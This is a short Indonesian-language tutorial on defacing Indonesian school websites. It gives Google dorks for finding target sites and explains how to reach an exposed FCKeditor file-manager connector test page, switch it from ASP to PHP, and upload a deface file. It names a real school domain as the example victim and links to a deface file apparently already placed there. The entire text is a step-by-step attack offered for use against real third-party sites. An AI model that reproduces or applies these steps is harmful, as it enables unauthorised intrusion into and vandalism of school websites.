Cara Deface Website Sekolah Indonesia

         

1. Siapkan file deface txt / html anda

2. Dork: 

• inurl:/html/siswa.php? 
• inurl:/html/alumni.php?
• inurl:/html/guru.php?

3.  Exploit :  /editor/filemanager/connectors/test.html (copy ni)

4. Contoh admin dapat website ni :

http://www.sman1kotabaru.sch.id/html/siswa.php

Gantikan Menjadi ini :

http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/test.html

5. Ganti ASP jadi PHP.

6. Browse file txt / html yang sudah disiapkan -> open -> upload.

7. Nak Lihat Deface anda : http://xxx.sch.id/userfiles/file/nama-file.txt

Hasil Deface : http://www.sman1kotabaru.sch.id/userfiles/file/khai.txt

Belajar yang upload-upload dulu :3 bila dah pro baru boleh belajar yang lebih atas lagi :)